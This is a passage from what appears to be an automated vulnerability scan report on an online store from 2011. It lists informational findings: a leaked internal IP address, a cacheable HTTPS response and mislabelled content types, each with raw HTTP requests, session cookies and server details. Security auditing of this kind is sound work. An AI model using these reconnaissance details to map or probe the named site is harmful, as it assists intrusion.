       <script type="text/javascript">(function(){var cfsTrack = function(){setTimeout(function(){var img = new Image(1,1);img.src = '//7154200626---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif';}, 100);};if (window.attachEvent) {window.attachEvent('onload', cfsTrack);} else {window.addEventListener('load', cfsTrack, false);}})();</script><noscript><img src="//7154200626---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif" height=1 width=1 alt="" border="0" /></noscript>








<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/s_code_20102010.js"></script>
<script type="text/javascript">






/* <form name="analyticsForm" method="post" action="/DRHM/store">
   <input type="hidden" name="Action" value="DisplayShoppingCartPage"/>
   <input type="hidden" name="SiteID" value="para"/>
   <input type="hidden" name="Locale" value="en_US"/>
   <input type="hidden" name="Form" value="com.digitalriver.template.form.ShoppingCartForm"/>
   <input type="hidden" name="CallingPageID" value="ThreePgCheckoutAddressPaymentInfoPage"/>
   <input type="hidden" name="Env" value="BASE"/> */
omnProductName='';





omnProductName+=';[1]SP-SMBPanel: Parallels Small Business Panel for Windows - 1 User,'.replace(/[^A-Za-z0-9 ,;:.]/g, '');

omnPageName='Checkout: Address';
omnChannel='Checkout';
omnProp2='Checkout: Shopping Cart';
omnProp4='Checkout';
omnEvents='scCheckout'
omnProducts=omnProductName;
/* </form> */




</script>
<script type="text/javascript">
       s.pageName=omnPageName
       if (omnChannel) s.channel= omnChannel
       s.currencyCode='USD'
       s.charSet='UTF-8'
       if (omnProp4) s.pageType= omnProp4 // Page Type
       /* Traffice Variables */
       if (omnProp2) s.prop2= omnProp2 //Category
       if (omnProp4) s.prop4= omnProp4 // Page Type
       /* Conversion Variables */
       if (omnState) s.state= omnState
       if (omnZip) s.zip= omnZip
       if (omnEvents) s.events = omnEvents
       if (omnProducts) s.products= omnProducts
       if (omnPurchaseID) s.purchaseID = omnPurchaseID
       /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
       var s_code=s.t();if(s_code)document.write(s_code)
</script>













<!-- ################################ -->
<!-- ### BEGIN Google Custom, TOP ### -->
<script type="text/javascript">
   var _gaq = _gaq || [];

   _gaq.push(['_setAccount', 'UA-363966-1']);
   _gaq.push(['_setDomainName', '.parallels.com']);
   _gaq.push(['_setAllowHash', false]);
   _gaq.push(['_trackPageview']);

   (function() {
       var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
       ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';

       var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
   })();
</script>
<!-- ### END Google Custom, TOP ### -->
<!-- ################################ -->






   <!-- Thank You page and Your Order is Being Processed Page -->

   
       
   


<!-- begin retargeting pixel -->


<script src="https://display.digitalriver.com/?aid=244" type="text/javascript" defer="defer"></script>



<!-- end retargeting pixel -->













</body>
</html>
6. Private IP addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.parallels.com
Path:   /store/para/en_US/AddItemsToRequisition/productID.222100500

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

Request

GET /store/para/en_US/AddItemsToRequisition/productID.222100500 HTTP/1.1
Host: store.parallels.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/small-business-panel/windows/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aspcms_sid=ed047e3c47a758dd56638158d4729675; __utmz=1.1299874733.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.529009189.1299874733.1299874733.1299874733.1; __utmc=1; __utmb=1.1.10.1299874733; s_cc=true; s_gpv_page=ParallelsSmallBusinessPanelforWindowsEN; s_vnum=1331410733871%26vn%3D1; s_invisit=true; s_nr=1299874733877-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Location: http://reservoir.marketstudio.net/reservoir?d=http%3A%2F%2Fstore.parallels.com%2Fstore%2Fpara%2Fen_US%2FAddItemsToRequisition%2FproductID.222100500%3Fresid%3D__RESID__%26rests%3D1299874690638&t=commerce&p=globalcommerce&p1=para&p2=24863180226&p3=newsession
Content-Type: text/plain
Set-Cookie: ORA_WX_SESSION="10.1.2.144:1028-0#0"; path=/
Set-Cookie: JSESSIONID=943A97EDDD493407ED3F48E4A043CCAD; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED436758C101F425550FD89CDA569B49779CFD; expires=Sun, 11-Mar-2012 02:07:22 GMT; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=98416068249,0)
Content-Length: 0
Date: Fri, 11 Mar 2011 20:18:10 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app61
Set-Cookie: BIGipServerp-drh-dc1pod6-pool2-active=2416050442.1028.0000; path=/

7. Cacheable HTTPS response  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.parallels.com
Path:   /DRHM/Storefront/Site/para/cm/images/favicon.ico

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /DRHM/Storefront/Site/para/cm/images/favicon.ico HTTP/1.1
Host: store.parallels.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1299874733.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1331410733871%26vn%3D1; ORA_WX_SESSION="10.1.2.144:1028-0#0"; JSESSIONID=943A97EDDD493407ED3F48E4A043CCAD; VISITOR_ID=971D4E8DFAED436758C101F425550FD89CDA569B49779CFD; BIGipServerp-drh-dc1pod6-pool2-active=2416050442.1028.0000; RefURL=http%3A%2F%2Fwww.parallels.com%2Fstore%2Fsmall-business-panel%2Fwindows%2F; aspcms_sid=c268913546380a1096a063587ad8f09a; mbox=check#true#1299874834|session#1299874748891-562918#1299876634; op_browser=safari_534.16; op_browserHigh=safari; op_os=windows; s_cc=true; __utma=1.529009189.1299874733.1299874733.1299874733.1; __utmc=1; __utmb=1.3.10.1299874733; s_gpv_page=Checkout%3A%20Shopping%20Cart; s_invisit=true; s_nr=1299874774917-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 17 Dec 2015 01:19:42 GMT
ETag: "47e-4bc5d917"
Content-Type: text/plain
Last-Modified: Wed, 14 Apr 2010 15:02:47 GMT
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=3750;ecid=128480876458,0)
Content-Length: 1150
Date: Thu, 16 Dec 2010 19:19:42 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app61
Accept-Ranges: bytes

............ .h.......(....... ..... .....@...................................$/.0$/..$/.0........$/.0$/..$/.0................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/.P$/..$/.P........$/.P$/..$/.P................................................................................
8. Content type incorrectly stated  previous
There are 3 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

8.1. http://store.parallels.com/DRHM/Storefront/Site/para/cm/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://store.parallels.com
Path:   /DRHM/Storefront/Site/para/cm/images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /DRHM/Storefront/Site/para/cm/images/favicon.ico HTTP/1.1
Host: store.parallels.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aspcms_sid=ed047e3c47a758dd56638158d4729675; __utmz=1.1299874733.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1331410733871%26vn%3D1; ORA_WX_SESSION="10.1.2.144:1028-0#0"; JSESSIONID=943A97EDDD493407ED3F48E4A043CCAD; VISITOR_ID=971D4E8DFAED436758C101F425550FD89CDA569B49779CFD; BIGipServerp-drh-dc1pod6-pool2-active=2416050442.1028.0000; mbox=check#true#1299874809|session#1299874748891-562918#1299876609; op_browser=safari_534.16; op_browserHigh=safari; op_os=windows; RefURL=http%3A%2F%2Fwww.parallels.com%2Fstore%2Fsmall-business-panel%2Fwindows%2F; s_cc=true; s_gpv_page=Checkout%3A%20Shopping%20Cart; s_invisit=true; s_nr=1299874750213-New; s_sq=%5B%5BB%5D%5D; __utma=1.529009189.1299874733.1299874733.1299874733.1; __utmc=1; __utmb=1.2.10.1299874733

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 17 Dec 2015 01:19:42 GMT
ETag: "47e-4bc5d917"
Content-Type: text/plain
Last-Modified: Wed, 14 Apr 2010 15:02:47 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=3722;ecid=68351305547,0)
Content-Length: 1150
Date: Thu, 16 Dec 2010 19:19:42 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app61
Accept-Ranges: bytes

............ .h.......(....... ..... .....@...................................$/.0$/..$/.0........$/.0$/..$/.0................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/.P$/..$/.P........$/.P$/..$/.P................................................................................
8.2. http://store.parallels.com/store/para/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://store.parallels.com
Path:   /store/para/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain plain text.

Request

GET /store/para/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage HTTP/1.1
Host: store.parallels.com
Proxy-Connection: keep-alive
Referer: http://store.parallels.com/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aspcms_sid=ed047e3c47a758dd56638158d4729675; __utmz=1.1299874733.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.529009189.1299874733.1299874733.1299874733.1; __utmc=1; __utmb=1.1.10.1299874733; s_vnum=1331410733871%26vn%3D1; ORA_WX_SESSION="10.1.2.144:1028-0#0"; JSESSIONID=943A97EDDD493407ED3F48E4A043CCAD; VISITOR_ID=971D4E8DFAED436758C101F425550FD89CDA569B49779CFD; BIGipServerp-drh-dc1pod6-pool2-active=2416050442.1028.0000; mbox=check#true#1299874809|session#1299874748891-562918#1299876609; op_browser=safari_534.16; op_browserHigh=safari; op_os=windows; RefURL=http%3A%2F%2Fwww.parallels.com%2Fstore%2Fsmall-business-panel%2Fwindows%2F; s_cc=true; s_gpv_page=Checkout%3A%20Shopping%20Cart; s_invisit=true; s_nr=1299874750213-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/css;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=68351303271,0)
Date: Fri, 11 Mar 2011 20:18:15 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app61
Content-Length: 6589


<!-- REQUEST ID: TIME=1299874695096:NODE=c1a6104:THREAD=399 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&Env=BASE&Locale=en_US&SiteID=para&ceid=168713900&cename=TopHeaderPopUpCssStyle&id=TopHeaderPopUpCssStylePage"-->



<!-- REQUEST ID: TIME=1299857028020:NODE=c1a6104:THREAD=4161; ESI Fragment - CREATED: Fri Mar 11 09:23:48 CST 2011 MAX-AGE: 50400+180 -->




<style type="text/css">
/* popUp overlay */
.popup_window_title_bar_wrapper {width: inherit; height: 34px;}
.popup_title_bar {position: relative; height: 23px; padding: 10px 10px 0 10px; float: left; border: 1px solid #797979; border-bottom: none; background: #cacaca url(//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/popup_title_bar_back.gif) repeat-x top left;}
.popup_title_header {font: 16px normal Arial, Helvetica, sans-serif; color: #000000; padding: 0; margin: 0; overflow: hidden; white-space: nowrap;}
.popup_close_button_wrapper {position: absolute; width: 75px; height: 33px; top: 0; right: 0;}
.popup_button_cover {float: right; height: 23px; padding: 10px 10px 0 7px; background: #cacaca url(//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/popup_title_bar_back.gif) repeat-x top left;}
.popup_middle_wrapper {width: inherit;}
.popup_content_wrapper {padding: 10px; float: left; border: 1px solid #797979; background-color: #efefef; background-repeat: repeat-x;}
.popup_content_iframe {position: absolute; z-index: 10004; top: 45px; left: 25px; border: 1px solid #c4c4c4; background-color: #ffffff;}
.popup_left_shadow_wrapper {width: 15px; float: left;}
.popup_right_shadow_wrapper {width: 15px; float: left;}
.popup_bottom_bar_wrapper {width: inherit; height: 15px;}
.popup_clear_it {clear: both; height: 0px; font-size: 0px; padding: 0; margin: 0;}
.popup_title_fade {float: right; height: 33px; width: 29px; background-repeat: no-repeat; background-image: url(//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/popup_title_bar_back_fade.png);}
/* shadows */
.popup_shadow1 {width: 15px; height: 34px; float: left; background-repeat: no-repeat;}
.popup_shadow2 {width: 15px; background-repeat: repeat-y;}
.popup_shadow3 {width: 15px; height: 16px; background-repeat: no-repeat;}
.popup_shadow4 {width: 31px; height: 15px; float: left; background-repeat: no-repeat;}
.popup_shadow5 {height: 15px; float: left; background-repeat: repeat-x;}
.popup_shadow6 {width: 31px; height: 15px; float: left; background-repeat: no-repeat;}
.popup_shadow7 {width: 15px; height: 16px; background-repeat: no-repeat;}
.popup_shadow8 {width: 15px; background-repeat: repeat-y;}
.popup_shadow9 {width: 15px; height: 34px; float: left; background-repeat: no-repeat;}
</style>
<!--[if IE 7]>
<style type="text/css">
.popup_content_wrapper {url(//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_content_back_shadow.gif);}
.popup_shadow1 {background-image: url(//drh.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow_corners.png); background-position: -16px 0;}
.popup_shadow2 {background-image: url(//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow_y.png); background-position: -16px 0;}
.popup_shadow3 {background-image: url(//drh.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow_corners.png); background-position: -16px -35px;}
.popup_shadow4 {background-image: url(//drh.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow_corners.png); background-position: 0 -68px;}
.popup_shadow5 {background-image: url(//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow_x.png);}
.popup_shadow6 {background-image: url(//drh.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow_corners.png); background-position: 0 -52px;}
.popup_shadow7 {background-image: url(//drh.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow_corners.png); background-position: 0 -35px;}
.popup_shadow8 {background-image: url(//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow_y.png);}
.popup_shadow9 {background-image: url(//drh.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow_corners.png);}
</style>
<![endif]-->
<!--[if lte IE 6]>
<style type="text/css">
.popup_title_fade {background: none!important;}
.popup_content_wrapper {url(//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_content_back_shadow.gif);}
.popup_shadow1 {filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//drh.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow1.png', sizingMethod='image'); background: none!important;}
.popup_shadow2 {filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow2.png', sizingMethod='scale'); background: none!important;}
.popup_shadow3 {filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//drh.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow3.png', sizingMethod='image'); background: none!important;}
.popup_shadow4 {filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow4.png', sizingMethod='image'); background: none!important;}
.popup_shadow5 {filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//drh.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow5.png', sizingMethod='scale'); background: none!important;}
.popup_shadow6 {filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow6.png', sizingMethod='image'); background: none!important;}
.popup_shadow7 {filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//drh.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow7.png', sizingMethod='image'); background: none!important;}
.popup_shadow8 {filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow8.png', sizingMethod='scale'); background: none!important;}
.popup_shadow9 {filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//drh.img.digitalriver.com/DRHM/Storefront/Library/images/popup/popup_shadow9.png', sizingMethod='image'); background: none!important;}
</style>
<![endif]-->


<!--!/esi:include -->
8.3. https://store.parallels.com/DRHM/Storefront/Site/para/cm/images/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://store.parallels.com
Path:   /DRHM/Storefront/Site/para/cm/images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /DRHM/Storefront/Site/para/cm/images/favicon.ico HTTP/1.1
Host: store.parallels.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1299874733.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1331410733871%26vn%3D1; ORA_WX_SESSION="10.1.2.144:1028-0#0"; JSESSIONID=943A97EDDD493407ED3F48E4A043CCAD; VISITOR_ID=971D4E8DFAED436758C101F425550FD89CDA569B49779CFD; BIGipServerp-drh-dc1pod6-pool2-active=2416050442.1028.0000; RefURL=http%3A%2F%2Fwww.parallels.com%2Fstore%2Fsmall-business-panel%2Fwindows%2F; aspcms_sid=c268913546380a1096a063587ad8f09a; mbox=check#true#1299874834|session#1299874748891-562918#1299876634; op_browser=safari_534.16; op_browserHigh=safari; op_os=windows; s_cc=true; __utma=1.529009189.1299874733.1299874733.1299874733.1; __utmc=1; __utmb=1.3.10.1299874733; s_gpv_page=Checkout%3A%20Shopping%20Cart; s_invisit=true; s_nr=1299874774917-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 17 Dec 2015 01:19:42 GMT
ETag: "47e-4bc5d917"
Content-Type: text/plain
Last-Modified: Wed, 14 Apr 2010 15:02:47 GMT
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=3750;ecid=128480876458,0)
Content-Length: 1150
Date: Thu, 16 Dec 2010 19:19:42 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app61
Accept-Ranges: bytes

............ .h.......(....... ..... .....@...................................$/.0$/..$/.0........$/.0$/..$/.0................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/..$/..$/..........$/..$/..$/..................................$/.P$/..$/.P........$/.P$/..$/.P................................................................................
Report generated by XSS.CX at Fri Mar 11 15:39:37 CST 2011.